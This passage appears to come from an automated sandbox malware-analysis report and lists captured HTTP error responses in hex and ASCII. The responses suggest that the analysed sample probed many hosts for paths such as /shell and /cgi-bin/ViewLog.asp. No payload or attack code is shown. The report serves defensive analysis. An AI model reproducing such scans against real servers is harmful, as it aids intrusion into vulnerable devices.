          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Mar 2024 04:23:12 GMTServer: ApacheContent-Length: 203Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu Mar 21 09:23:11 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Mar 2024 04:23:12 GMTServer: Apache/2.2.15 (CentOS)Content-Length: 292Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at 127.0.0.1 Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 21 Mar 2024 04:23:13 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cacheContent-Type: text/htmlContent-Length: 345Date: Mon, 02 Feb 1970 17:11:13 GMTServer: lighttpdData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Thu, 21 Mar 2024 04:23:13 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Thu, 21 Mar 2024 04:23:13 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Thu, 21 Mar 2024 04:23:13 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Thu, 21 Mar 2024 04:23:19 GMTserver: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fipscontent-length: 217content-type: text/html; charset=iso-8859-1set-cookie: NB_SRVID=srv91965255; path=/connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundVary: Accept-EncodingX-Frame-Options: SAMEORIGINContent-Type: text/htmlX-Content-Type-Options: nosniffDate: Thu, 21 Mar 2024 04:13:36 GMTCache-Control: no-cacheContent-Length: 223X-XSS-Protection: 1; mode=blockConnection: Keep-AliveAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 72 65 3e 3c 2f 70 72 65 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><head> <title>Not Found</title> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"></head><body><h2>Access Error: 404 -- Not Found</h2><pre></pre></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundVary: Accept-EncodingX-Frame-Options: SAMEORIGINContent-Type: text/htmlX-Content-Type-Options: nosniffDate: Thu, 21 Mar 2024 04:13:36 GMTCache-Control: no-cacheContent-Length: 223X-XSS-Protection: 1; mode=blockConnection: Keep-AliveAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 72 65 3e 3c 2f 70 72 65 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><head> <title>Not Found</title> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"></head><body><h2>Access Error: 404 -- Not Found</h2><pre></pre></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Mar 2024 05:23:33 GMTServer: webserverContent-Length: 195Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6c 6f 63 61 74 65 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't locate document: /cgi-bin/ViewLog.asp</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundVary: Accept-EncodingX-Frame-Options: SAMEORIGINContent-Type: text/htmlX-Content-Type-Options: nosniffDate: Thu, 21 Mar 2024 04:13:36 GMTCache-Control: no-cacheContent-Length: 223X-XSS-Protection: 1; mode=blockConnection: Keep-AliveAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 72 65 3e 3c 2f 70 72 65 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><head> <title>Not Found</title> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"></head><body><h2>Access Error: 404 -- Not Found</h2><pre></pre></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu Mar 21 07:23:34 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu Mar 21 07:23:34 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu Mar 21 07:23:34 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Mar 2024 04:23:38 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16Content-Length: 217Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 31 20 4d 61 72 20 32 30 32 34 20 30 34 3a 32 33 3a 33 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 36 20 28 43 65 6e 74 4f 53 29 20 50 48 50 2f 35 2e 34 2e 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 32 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>HTTP/1.1 400 Bad RequestDate: Thu, 21 Mar 2024 04:23:38 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16Content-Length: 226Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Mar 2024 04:23:39 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Server: ClausWeb-nginxcluster-host: server46.romania-webhosting.comData Raw: 65 66 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0d 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 0d 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0d 0a 3c 21 2d 2d 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 2d 2d 3e 0d 0a 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 40 69 6d 70 6f 72 74 20 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 49 6e 63 6f 6e 73 6f 6c 61 74 61 27 3b 0d 0a 68 74 6d 6c 20 7b 0d 0a 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 7d 0d 0a 0d 0a 62 6f 64 79 20 7b 0d 0a 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0d 0a 20 20 2f 2a 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 72 61 64 69 61 6c 2d 67 72 61 64 69 65 6e 74 28 23 31 31 35 38 31 45 2c 20 23 30 34 31 36 30 37 29 2c 20 75 72 6c 28 22 68 74 74 70 73 3a 2f 2f 6d 65 64 69 61 2e 67 69 70 68 79 2e 63 6f 6d 2f 6d 65 64 69 61 2f 6f 45 49 39 75 42 59 53 7a 4c 70 42 4b 2f 67 69 70 68 79 2e 67 69 66 22 29 3b 2a 2f 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 63 6f 76 65 72 3b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 49 6e 63 6f 6e 73 6f 6c 61 74 61 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 72 65 6d 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 31 32 38 2c 20 32 35 35 2c 20 31 32 38 2c 20 30 2e 38 29 3b 0d 0a 20 20 74 65 78 74 2d 73 68 61 64 6f 